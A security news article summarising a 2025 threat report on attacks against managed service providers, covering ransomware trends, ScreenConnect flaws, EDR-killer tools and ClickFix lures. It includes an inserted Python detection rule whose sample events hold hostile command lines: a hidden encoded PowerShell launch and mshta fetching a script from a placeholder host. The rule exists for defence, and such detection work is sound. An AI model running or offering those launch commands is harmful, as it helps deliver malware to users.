SecureWorld News

Report: Why Managed Service Providers Are Now Ground Zero for Attacks

Written by Cam Sivesind | Tue | Jan 20, 2026 | 10:28 PM Z

Managed Service Providers (MSPs) have long been part of the cybersecurity supply chain. Now, they have become one of its most attractive targets.

According to the ConnectWise 2025 MSP Threat Report, attackers are increasingly bypassing large, well-defended enterprises and instead compromising MSPs as a force multiplier—using one breach to reach dozens or hundreds of downstream small and midsized business (SMB) customers.

Drawing on millions of EDR and SIEM alerts collected by the ConnectWise Cyber Research Unit (CRU), the report paints a stark picture: MSPs are under sustained, adaptive attack pressure, and threat actors are evolving faster than many service providers—and their clients—can respond.

The report makes clear that MSPs sit at a uniquely dangerous intersection:

  • They often manage high-privilege remote access tools.

  • They support many clients with shared infrastructure.

  • They may have fewer dedicated security resources than large enterprises.

  • A single compromise can cascade across multiple customer environments.

This dynamic explains why 78% of MSPs surveyed believe a serious cyberattack could put them out of business, and 83% say they plan to increase cybersecurity investment over the next 12 months.

For attackers, MSPs represent efficiency and scale. For defenders, they represent concentration of risk.

Ransomware in 2024–2025: smaller targets, new tactics

The fall of LockBit—and what replaced it

The coordinated takedown of LockBit in early 2025 was a watershed moment. Law enforcement seized infrastructure, arrested affiliates, and released more than 7,000 decryption keys, significantly disrupting one of the most dominant ransomware-as-a-service (RaaS) groups.

But the report emphasizes that this did not reduce ransomware overall. Instead, it fractured the ecosystem:

  • LockBit offshoots like "NotLockbit" emerged.

  • New players such as BianLian and CosmicBeetle gained traction.

  • RaaS models persisted, just with less centralized branding.

Shift toward MSPs and SMBs

Threat actors increasingly targeted mid-sized organizations and MSP-managed environments to avoid scrutiny associated with large enterprise attacks. This expanded the attack surface for MSPs supporting SMBs with limited in-house security maturity.

Data extortion without encryption

A key evolution highlighted in the report is the rise of pure data extortion. Groups like RansomHub stole data without encrypting systems—bypassing controls designed to detect ransomware behavior and still exerting pressure by threatening public disclosure.

For MSPs and their clients, this means:

  • Backups alone are not sufficient.

  • Data visibility, access control, and exfiltration detection are critical.

One of the most consequential findings for MSPs involved two critical vulnerabilities in ScreenConnect:

  • CVE-2024-1708 (path traversal, CVSS 8.4)

  • CVE-2024-1709 (authentication bypass, CVSS 10)

These flaws allowed attackers to gain unauthorized access to MSP environments—particularly dangerous given the privileged nature of remote access tools. Cloud instances were secured within 48 hours, but unpatched on-premises systems remained heavily exploited, prompting U.S. CISA to add CVE-2024-1709 to its Known Exploited Vulnerabilities catalog.

The lesson is blunt: remote access tools are now high-value attack surfaces, and delayed patching creates cascading client risk.

Edge security: the new front line

The report documents more than 84,000 alerts targeting edge device vulnerabilities across MSP-managed environments in 2024 alone, with roughly 60% involving vulnerabilities disclosed that same year.

Common targets included:

  • VPNs and SSL gateways

  • Firewalls

  • Managed file transfer platforms

  • RDP and exposed remote services

Threat actors increasingly exploit:

  • Unpatched edge software

  • Misconfigurations

  • Weak or reused credentials

  • Zero-day vulnerabilities in perimeter technologies

For MSPs, edge security failures can become supply chain attacks by default, enabling lateral movement into customer networks.

EDR evasion: attackers are actively blinding defenders

One of the most alarming trends is the rise of purpose-built "EDR killer" tools. The ConnectWise CRU observed widespread use of techniques designed to disable or evade endpoint detection before deploying payloads.

Tools and techniques documented include:

  • BYOVD (Bring Your Own Vulnerable Driver) attacks

  • Kernel-level exploits

  • Abuse of legitimate utilities such as TDSSKiller

  • Tools like EDRKillShifter, Terminator, AuKill, EDRSilencer, and EDRSandBlast

These techniques allow attackers to persist undetected, exfiltrate data, and deploy ransomware with minimal resistance.

Implication: EDR alone is no longer sufficient. MSPs and enterprises must integrate tamper protection, network telemetry, SIEM correlation, and zero-trust principles.

Drive-by compromise and 'ClickFix' attacks

Drive-by compromise accounted for 22% of all incidents reviewed in 2024, with a sharp rise in a new social-engineering technique known as ClickFix.

Instead of asking victims to download files, attackers trick users into:

  • Opening the Run prompt or PowerShell

  • Copy-pasting a command disguised as a CAPTCHA fix or browser update

  • Executing malware using native system tools

Because there is no effective way to scan what users copy and paste, ClickFix attacks bypass many traditional defenses, especially in poorly trained environments.
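As an added example (not from the report or this article), here is a small detection rule run over constructed Sysmon-style process-creation events; it flags the launch pattern described above, a script interpreter started from explorer.exe (the parent of the Run prompt and Start menu) with command-line traits a person rarely types by hand. The event fields, regular expressions and sample events are assumptions made for illustration, not ConnectWise detection content.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon Event ID 1 (process creation) records, trimmed to the
# fields the rule uses. All five events are invented for this example; the
# base64 blob is just "ABCDEFGHIJKLMNOP" encoded, not a real payload.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile"},                     # technician console
    {"id": 2, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -ep bypass -enc QUJDREVGR0hJSktMTU5PUA=="},  # pasted via Win+R
    {"id": 3, "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -enc QUJDREVGR0hJSktMTU5PUA=="},  # scheduled task: other rules
    {"id": 4, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://captcha.example.invalid/verify.hta"},  # fake CAPTCHA page
    {"id": 5, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Interpreters a pasted ClickFix one-liner typically runs under.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that are odd for something a person typed interactively.
TRAITS = {
    "hidden_window": re.compile(r"(?i)(^|\s)-w(?:indowstyle)?\s+h(?:idden)?\b"),
    "encoded_command": re.compile(r"(?i)(^|\s)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"),
    "policy_bypass": re.compile(r"(?i)(^|\s)-e(?:p|xecutionpolicy)\s+bypass\b"),
    "remote_fetch": re.compile(r"(?i)https?://|\b(?:irm|iwr|invoke-webrequest|downloadstring)\b"),
}


def clickfix_traits(event):
    """Suspicious traits of one event, or [] when the rule does not apply.
    Only interpreters launched from explorer.exe (the Run prompt's parent) count."""
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    child = PureWindowsPath(event["Image"]).name.lower()
    if parent != "explorer.exe" or child not in INTERPRETERS:
        return []
    return [name for name, rx in TRAITS.items() if rx.search(event["CommandLine"])]


def detect_clickfix(events):
    """Map event id -> traits for every event the rule fires on."""
    return {ev["id"]: t for ev in events if (t := clickfix_traits(ev))}


if __name__ == "__main__":
    for eid, traits in detect_clickfix(SAMPLE_EVENTS).items():
        print(f"event {eid}: possible ClickFix launch ({', '.join(traits)})")
```

Event 3 is deliberately left to other rules: the same command line under a service parent is a different (and also worth detecting) pattern, and keeping the parent check tight is what keeps this rule quiet on technicians who open a console normally.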

What this means for MSPs

MSPs are no longer just service providers—they are critical infrastructure in the SMB economy.

Key takeaways:

  • MSP security posture directly determines client security posture.

  • Patch management and vulnerability remediation must be treated as existential priorities.

  • Security tooling must be layered, monitored, and resilient against evasion.

  • Incident response readiness must account for multi-tenant impact.

As the report notes, threat actors will continue targeting MSPs precisely because of their leverage.

Implications for cybersecurity vendors

For vendors selling into the MSP ecosystem, the report signals several imperatives:

  • Security by default in remote access and management tools

  • Faster patch cycles and transparent disclosure processes

  • Built-in telemetry, tamper protection, and abuse detection

  • Tooling designed for scale, automation, and multi-customer environments

Vendors that fail to account for MSP-specific risk may unintentionally become part of the attack chain.

What enterprise clients should understand

Enterprises relying on MSPs must recognize:

  • MSP compromise is a first-order risk, not a third-party afterthought.

  • Due diligence should include MSP patching cadence, EDR strategy, and incident response maturity.

  • Shared responsibility models must be explicit and enforced contractually.

Security leaders should treat MSP relationships with the same scrutiny applied to cloud providers or SaaS vendors.